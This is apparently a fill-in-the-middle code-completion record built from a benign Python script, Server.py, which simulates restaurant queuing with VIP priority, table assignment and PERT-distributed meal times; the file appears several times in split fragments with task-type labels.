def queue_size(self):
"""
Get the length of queue, namely, the number of groups currently waiting
:return: int, number of groups waiting in queue
"""
return len(self.groups)
def isEmpty(self):
"""
Whether there are any groups still waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly arrived group to the queue at the proper position
:param group: the group waiting to enter the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue() | >>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If the current group is a VIP group, move it forward by up to four positions in the queue
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # pop the last list element, i.e. serve the first-come group
"""
Pop the head of the queue (the element at index len(queue) - 1)
:return: Group object
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When one group finish their meal, set their table's current group to none
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
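# --- Added illustration (not part of the original script) ---------------------
# How the Queue and Group classes above interact: non-VIP groups are served
# first-come-first-served, while a VIP group is moved forward, so group 3 below
# is seated before group 2 even though it registered later. The helper name and
# the arrival times/sizes/IDs are made-up example values.
def _demo_service_order():
    q = Queue()
    q.add_queue(Group(12, 2, False, 0))   # t=12, regular
    q.add_queue(Group(14, 1, True, 1))    # t=14, VIP
    q.add_queue(Group(20, 2, False, 2))   # t=20, regular
    q.add_queue(Group(30, 1, True, 3))    # t=30, VIP
    served = [q.del_queue().get_groupID() for _ in range(q.queue_size())]
    assert served == [0, 1, 3, 2]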
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group at it has finished their meal
:param current_time: current time point
:param nextGroup_endTime: dict mapping a table's number to the time point at which its current group will finish
:param table_type: list whose elements are Table objects
:return: None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
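# --- Added clarification (not part of the original script) --------------------
# TableFinish() above assumes the default tablesSetting(6, 4, 2) layout, where the
# global table numbers are 0-5 (two-seaters), 6-9 (four-seaters) and 10-11
# (six-seaters); the offsets n, n-6 and n-10 convert a global table number back
# into an index of the matching list. The helper below only illustrates that mapping.
def _demo_table_numbering():
    t2, t4, t6 = tablesSetting(6, 4, 2)
    assert [t.get_num() for t in t2] == [0, 1, 2, 3, 4, 5]
    assert [t.get_num() for t in t4] == [6, 7, 8, 9]
    assert [t.get_num() for t in t6] == [10, 11]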
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point at which the current simulation step is running
:param table: list whose elements are Table objects
:param queue: the queue of waiting groups for this table size
:param total_time: total duration of the simulation
:param total_timeR: list storing the waiting time for each group served or being served
:param nextGroup_endTime: dict mapping a table's number to the time point at which its current group will finish
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duration is over; handle groups that were never assigned a table
if current_time == total_time - 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.')
def generation(Duration, amount):
"""
Generating the data for groups, and run the simulation
:param Duration: Total length of time the simulation would run
:param amount: Estimated number of groups would come
"""
# Generate group sizes, the total group number is "amount", the number of people in each group is between 1 and 6
size = np.random.randint(1, 7, amount)
# Generate vip situation, based on the probability of 8%
vip = []
for i in range(amount):
num = np.random.randint(0, 101, 1)
if (num >= 0) & (num <= 8):
vip.append(True)
else:
vip.append(False)
# Generate the registration time for each group
timestamp_list = mod_pert_random(0, Duration // 2, Duration, samples=amount).astype(int)
timestamp_list = list(timestamp_list)
counter = 0
queue_2 = Queue()
queue_4 = Queue()
queue_6 = Queue()
table_2, table_4, table_6 = tablesSetting(6, 4, 2) # Initializing tables
total_timeR_2 = [] # For calculating total average waiting time
nextGroup_endTime_2 = {} # {No. of table: the ending time of the table}
total_timeR_4 = []
nextGroup_endTime_4 = {}
total_timeR_6 = []
nextGroup_endTime_6 = {}
groupNumb = 0 # all group have their unique ID
for i in range(Duration):
while i in timestamp_list:
if size[counter] == 1 or size[counter] == 2:
queue_2.add_queue(Group(i, 2, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 3 or size[counter] == 4:
queue_4.add_queue(Group(i, 4, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 5 or size[counter] == 6:
queue_6.add_queue(Group(i, 6, vip[counter], groupNumb))
counter += 1
groupNumb += 1
timestamp_list.remove(i) # Deal with the situation that several groups arrive at the same time point
# Run the simulation
simulation(i, table_2, Duration, queue_2, total_timeR_2, nextGroup_endTime_2)
simulation(i, table_4, Duration, queue_4, total_timeR_4, nextGroup_endTime_4)
simulation(i, table_6, Duration, queue_6, total_timeR_6, nextGroup_endTime_6)
# Summary
if i == Duration-1:
print("Total groups served (groups who finished their meal or on the table currently):",
len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
avg=(sum(total_timeR_2)+sum(total_timeR_4)+sum(total_timeR_6))/(len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
print('Average waiting time for groups served: {0:.2f}'.format(avg), "minute(s)")
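# --- Added usage note (not part of the original script) -----------------------
# generation() can also be driven without the interactive prompts in client()
# below, e.g. from a test or a notebook; it prints its progress and summary
# rather than returning data. The helper name and the duration/amount values
# are arbitrary examples.
def _demo_batch_run():
    generation(Duration=180, amount=60)   # e.g. three simulated hours, ~60 expected groups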
def client():
print('Welcome to Restaurant Queuing Simulation System!')
print('Please enter the total time (integer) you want for simulation:')
duration=int(input())
print('Please enter the total groups of customers you predict the restaurant would have:')
groups=int(input())
generation(duration, groups)
client() | >>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1) | random_line_split |
Server.py | import numpy as np
def mod_pert_random(low, likely, high, confidence=4, samples=30):
"""Produce random numbers according to the 'Modified PERT'
distribution.
:param low: The lowest value expected as possible.
:param likely: The 'most likely' value, statistically, the mode.
:param high: The highest value expected as possible.
:param confidence: This is typically called 'lambda' in literature
about the Modified PERT distribution. The value
4 here matches the standard PERT curve. Higher
values indicate higher confidence in the mode.
:param samples: The amount of number to generate, default value is 30.
Formulas from "Modified Pert Simulation" by Paulo Buchsbaum.
"""
# Check minimum & maximum confidence levels to allow:
confidence = min(8, confidence)
confidence = max(2, confidence)
mean = (low + confidence * likely + high) / (confidence + 2)
a = (mean - low) / (high - low) * (confidence + 2)
b = ((confidence + 1) * high - low - confidence * likely) / (high - low)
beta = np.random.beta(a, b, samples)
beta = beta * (high - low) + low
return beta
class Queue:
def __init__(self):
self.groups = []
def queue_size(self):
"""
Get the length of queue, namely, the number of groups currently waiting
:return: int, number of groups waiting in queue
"""
return len(self.groups)
def isEmpty(self):
"""
Whether there are any groups still waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly arrived group to the queue at the proper position
:param group: the group waiting to enter the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If the current group is a VIP group, move it forward by up to four positions in the queue
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
|
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # pop the last list element, i.e. serve the first-come group
"""
Pop the head of the queue (the element at index len(queue) - 1)
:return: Group object
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When one group finish their meal, set their table's current group to none
"""
self.currentGroup = None
def get_num(self):
return self.num
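# --- Added illustration (not part of the original script) ---------------------
# The lifecycle of a Table: free -> occupied via startNext() -> free again via
# cleanTable(). The placeholder object stands in for a Group purely for this
# sketch; in the simulation the occupant is always a Group instance.
def _demo_table_lifecycle():
    t = Table(0, 2)
    assert not t.busy()       # a freshly created table is unoccupied
    t.startNext(object())     # seat a (placeholder) group
    assert t.busy()
    t.cleanTable()            # the group leaves; the table is free again
    assert not t.busy()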
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group at it has finished their meal
:param current_time: current time point
:param nextGroup_endTime: dict mapping a table's number to the time point at which its current group will finish
:param table_type: list whose elements are Table objects
:return: None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point at which the current simulation step is running
:param table: list whose elements are Table objects
:param queue: the queue of waiting groups for this table size
:param total_time: total duration of the simulation
:param total_timeR: list storing the waiting time for each group served or being served
:param nextGroup_endTime: dict mapping a table's number to the time point at which its current group will finish
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duration is over; handle groups that were never assigned a table
if current_time == total_time - 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.')
def generation(Duration, amount):
"""
Generate the data for the groups and run the simulation
:param Duration: Total length of time the simulation will run
:param amount: Estimated number of groups expected to come
"""
# Generate group sizes, the total group number is "amount", the number of people in each group is between 1 and 6
size = np.random.randint(1, 7, amount)
# Flag VIP groups: a draw of 0-8 out of 0-100 marks the group as VIP (roughly an 8% chance)
vip = []
for i in range(amount):
num = np.random.randint(0, 101, 1)
if (num >= 0) & (num <= 8):
vip.append(True)
else:
vip.append(False)
# Generate the registration time for each group
timestamp_list = mod_pert_random(0, Duration // 2, Duration, samples=amount).astype(int)
timestamp_list = list(timestamp_list)
counter = 0
queue_2 = Queue()
queue_4 = Queue()
queue_6 = Queue()
table_2, table_4, table_6 = tablesSetting(6, 4, 2) # Initializing tables
total_timeR_2 = [] # For calculating total average waiting time
nextGroup_endTime_2 = {} # {No. of table: the ending time of the table}
total_timeR_4 = []
nextGroup_endTime_4 = {}
total_timeR_6 = []
nextGroup_endTime_6 = {}
groupNumb = 0 # every group gets a unique ID
for i in range(Duration):
while i in timestamp_list:
if size[counter] == 1 or size[counter] == 2:
queue_2.add_queue(Group(i, 2, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 3 or size[counter] == 4:
queue_4.add_queue(Group(i, 4, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 5 or size[counter] == 6:
queue_6.add_queue(Group(i, 6, vip[counter], groupNumb))
counter += 1
groupNumb += 1
timestamp_list.remove(i) # Handle several groups arriving at the same time point
# Run the simulation
simulation(i, table_2, Duration, queue_2, total_timeR_2, nextGroup_endTime_2)
simulation(i, table_4, Duration, queue_4, total_timeR_4, nextGroup_endTime_4)
simulation(i, table_6, Duration, queue_6, total_timeR_6, nextGroup_endTime_6)
# Summary
if i == Duration-1:
print("Total groups served (groups who finished their meal or on the table currently):",
len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
avg=(sum(total_timeR_2)+sum(total_timeR_4)+sum(total_timeR_6))/(len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
print('Average waiting time for groups served: {0:.2f}'.format(avg), "minute(s)")
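# Example call (illustrative values, not from the original script): generation(180, 40)
# simulates a 180-minute service window with about 40 groups, their registration times
# drawn from mod_pert_random(0, 90, 180) so arrivals cluster around the middle of service.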
def client():
print('Welcome to Restaurant Queuing Simulation System!')
print('Please enter the total time (integer) you want for simulation:')
duration=int(input())
print('Please enter the total groups of customers you predict the restaurant would have:')
groups=int(input())
generation(duration, groups)
client()
| self.groups.insert(1, group) | conditional_block |
Server.py | import numpy as np
def mod_pert_random(low, likely, high, confidence=4, samples=30):
"""Produce random numbers according to the 'Modified PERT'
distribution.
:param low: The lowest value expected as possible.
:param likely: The 'most likely' value, statistically, the mode.
:param high: The highest value expected as possible.
:param confidence: This is typically called 'lambda' in literature
about the Modified PERT distribution. The value
4 here matches the standard PERT curve. Higher
values indicate higher confidence in the mode.
:param samples: The number of values to generate; the default is 30.
Formulas from "Modified Pert Simulation" by Paulo Buchsbaum.
"""
# Check minimum & maximum confidence levels to allow:
confidence = min(8, confidence)
confidence = max(2, confidence)
mean = (low + confidence * likely + high) / (confidence + 2)
a = (mean - low) / (high - low) * (confidence + 2)
b = ((confidence + 1) * high - low - confidence * likely) / (high - low)
beta = np.random.beta(a, b, samples)
beta = beta * (high - low) + low
return beta
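# Worked example (added for illustration): with low=45, likely=75, high=120 and the
# default confidence of 4, the PERT mean is (45 + 4*75 + 120) / 6 = 77.5, so a call like
#   mod_pert_random(45, 75, 120, samples=3)
# returns three values that cluster around 77.5; exact numbers vary with each run because
# np.random.beta is sampled.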
class Queue:
def __init__(self):
self.groups = []
def queue_size(self):
"""
Get the length of queue, namely, the number of groups currently waiting
:return: int, number of groups waiting in queue
"""
return len(self.groups)
def isEmpty(self):
"""
Check whether the queue is empty, i.e. no group is waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly come group into queue properly
:param group: the group waiting to enter the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # A VIP group skips ahead of the most recent arrivals (at most four) but never passes another VIP
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # pop the last list element, i.e. the group that arrived first
"""
Pop the head of the queue (the element at index len(queue) - 1)
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When a group finishes its meal, set the table's current group to None
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
|
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group on it finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict mapping table number to the time at which the group currently at that table finishes
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list, storing waiting time for each group served or is being served
:param nextGroup_endTime: dict mapping table number to the time at which the group currently at that table finishes
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duration is over; handle groups that were never assigned a table
if current_time == total_time- 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.')
def generation(Duration, amount):
"""
Generate the data for the groups and run the simulation
:param Duration: Total length of time the simulation will run
:param amount: Estimated number of groups expected to come
"""
# Generate group sizes, the total group number is "amount", the number of people in each group is between 1 and 6
size = np.random.randint(1, 7, amount)
# Flag VIP groups: a draw of 0-8 out of 0-100 marks the group as VIP (roughly an 8% chance)
vip = []
for i in range(amount):
num = np.random.randint(0, 101, 1)
if (num >= 0) & (num <= 8):
vip.append(True)
else:
vip.append(False)
# Generate the registration time for each group
timestamp_list = mod_pert_random(0, Duration // 2, Duration, samples=amount).astype(int)
timestamp_list = list(timestamp_list)
counter = 0
queue_2 = Queue()
queue_4 = Queue()
queue_6 = Queue()
table_2, table_4, table_6 = tablesSetting(6, 4, 2) # Initializing tables
total_timeR_2 = [] # For calculating total average waiting time
nextGroup_endTime_2 = {} # {No. of table: the ending time of the table}
total_timeR_4 = []
nextGroup_endTime_4 = {}
total_timeR_6 = []
nextGroup_endTime_6 = {}
groupNumb = 0 # every group gets a unique ID
for i in range(Duration):
while i in timestamp_list:
if size[counter] == 1 or size[counter] == 2:
queue_2.add_queue(Group(i, 2, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 3 or size[counter] == 4:
queue_4.add_queue(Group(i, 4, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 5 or size[counter] == 6:
queue_6.add_queue(Group(i, 6, vip[counter], groupNumb))
counter += 1
groupNumb += 1
timestamp_list.remove(i) # Handle several groups arriving at the same time point
# Run the simulation
simulation(i, table_2, Duration, queue_2, total_timeR_2, nextGroup_endTime_2)
simulation(i, table_4, Duration, queue_4, total_timeR_4, nextGroup_endTime_4)
simulation(i, table_6, Duration, queue_6, total_timeR_6, nextGroup_endTime_6)
# Summary
if i == Duration-1:
print("Total groups served (groups who finished their meal or on the table currently):",
len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
avg=(sum(total_timeR_2)+sum(total_timeR_4)+sum(total_timeR_6))/(len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
print('Average waiting time for groups served: {0:.2f}'.format(avg), "minute(s)")
def client():
print('Welcome to Restaurant Queuing Simulation System!')
print('Please enter the total time (integer) you want for simulation:')
duration=int(input())
print('Please enter the total groups of customers you predict the restaurant would have:')
groups=int(input())
generation(duration, groups)
client()
| """
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp | identifier_body |
Server.py | import numpy as np
def mod_pert_random(low, likely, high, confidence=4, samples=30):
"""Produce random numbers according to the 'Modified PERT'
distribution.
:param low: The lowest value expected as possible.
:param likely: The 'most likely' value, statistically, the mode.
:param high: The highest value expected as possible.
:param confidence: This is typically called 'lambda' in literature
about the Modified PERT distribution. The value
4 here matches the standard PERT curve. Higher
values indicate higher confidence in the mode.
:param samples: The number of values to generate; the default is 30.
Formulas from "Modified Pert Simulation" by Paulo Buchsbaum.
"""
# Check minimum & maximum confidence levels to allow:
confidence = min(8, confidence)
confidence = max(2, confidence)
mean = (low + confidence * likely + high) / (confidence + 2)
a = (mean - low) / (high - low) * (confidence + 2)
b = ((confidence + 1) * high - low - confidence * likely) / (high - low)
beta = np.random.beta(a, b, samples)
beta = beta * (high - low) + low
return beta
class Queue:
def __init__(self):
self.groups = []
def queue_size(self):
"""
Get the length of queue, namely, the number of groups currently waiting
:return: int, number of groups waiting in queue
"""
return len(self.groups)
def isEmpty(self):
"""
Check whether the queue is empty, i.e. no group is waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def | (self, group):
"""
Add the newly come group into queue properly
:param group: the group waiting to enter the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
